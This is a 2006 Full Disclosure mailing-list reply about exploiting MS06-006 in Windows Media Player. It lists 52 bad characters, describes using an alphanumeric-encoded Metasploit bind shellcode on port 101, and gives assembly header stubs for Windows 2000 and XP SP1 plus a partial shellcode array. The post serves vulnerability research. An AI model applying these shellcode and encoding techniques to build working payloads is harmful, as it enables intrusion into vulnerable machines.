Full Disclosure mailing list archives
Re: MS06-06 Windows Media Player Exploitation
From: "ad () heapoverflow com" <ad () heapoverflow com>
Date: Thu, 16 Feb 2006 23:54:50 +0100
If you try the shellcode it won't work, of course, because it's made in another exploitation environment, but at least if you are in the same situation you can try this method, depending on your current registers and modding the shellcode header to fit your vulnerability environment, where the Metasploit project can't mod this "locked" header. Hope it helps.

ad () heapoverflow com wrote:
Not sure what you are looking for, but read this below; it's from an unpublished PoC where I had to trick with 52 bad chars:

--------------------------------------------------------------------------------------------

52 BADCHARS:
0x00 0x22 0x61 0x62 0x63 0x64 0x65 0x66 0x67 0x68 0x69 0x70 0x71 0x72 0x73 0x74 0x75 0x76 0x77 0x78 0x79 0xE0 0xE1 0xE2 0xE3 0xE4 0xE5 0xE6 0xE7 0xE8 0xE9 0xEA 0xEB 0xEC 0xED 0xEE 0xEF 0xF0 0xF1 0xF2 0xF3 0xF4 0xF5 0xF6 0xF8 0xF9 0xFA 0xFB 0xFC 0xFD 0xFE 0xFF

Due to the high number of bad chars, especially an upper/lower case conflict, I have used the msf bind shellcode (port 101) with the PexAlphaNum encoder.

    EB 03          JMP SHORT 0012EE63
    59             POP ECX
    EB 05          JMP SHORT 0012EE68
    E8 F8FFFFFF    CALL 0012EE60

But it contains 7 bad chars as you can see, so another way is (for 2k):

    83C3 1C        ADD EBX,1C
    53             PUSH EBX
    59             POP ECX

Because ebx+1c is a fixed address pointing where the alphanum shellcode starts, and so on, it is popped into ecx correctly, with 0 bad chars. And the one for XP SP1 (because there is no more direct pointer where I need one, but I found one near the dword of a reg):

    834424 08 1C   ADD DWORD PTR SS:[ESP+8],1C
    895C24 08      MOV EBX,DWORD PTR SS:[ESP+8]
    53             PUSH EBX
    59             POP ECX

------------------------------------------------------------------------------------------------

/* modded metasploit bind shellcode, port 101 */
char scode1[]=
"\x90\x90\x90\x90\x90\x83\xC3\x1C\x53\x59"
/* above this text is the modded header for 2k; it changes depending on the OS you exploit, read my exploit's header or debug for more information, this is how I trick with 52 badchars...
thanks to the msf guys for all the rest, this is a great alphanum uppercase shellcode, really appreciated here :) */

c0ntex wrote:

No exploit, just some basic research - anyone with 100% ASCII win32 shellcode?
http://open-security.org/winmedia/index.html

--
regards
c0ntex

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- MS06-06 Windows Media Player Exploitation c0ntex (Feb 16)
- Re: MS06-06 Windows Media Player Exploitation ad () heapoverflow com (Feb 16)
- Re: MS06-06 Windows Media Player Exploitation ad () heapoverflow com (Feb 16)
- Re: MS06-06 Windows Media Player Exploitation H D Moore (Feb 16)
- Re: MS06-06 Windows Media Player Exploitation c0ntex (Feb 16)
- Re: MS06-06 Windows Media Player Exploitation H D Moore (Feb 16)
- Re: MS06-0[0]6 Windows Media Player Exploitation [CODE] Matthew Murphy (Feb 17)
- Re: MS06-0[0]6 Windows Media Player Exploitation [CODE] H D Moore (Feb 17)
- Re: MS06-0[0]6 Windows Media Player Exploitation [CODE] H D Moore (Feb 17)
- Re: MS06-06 Windows Media Player Exploitation c0ntex (Feb 17)
- Re: MS06-06 Windows Media Player Exploitation c0ntex (Feb 17)
- Re: MS06-06 Windows Media Player Exploitation c0ntex (Feb 16)
- Re: MS06-06 Windows Media Player Exploitation ad () heapoverflow com (Feb 16)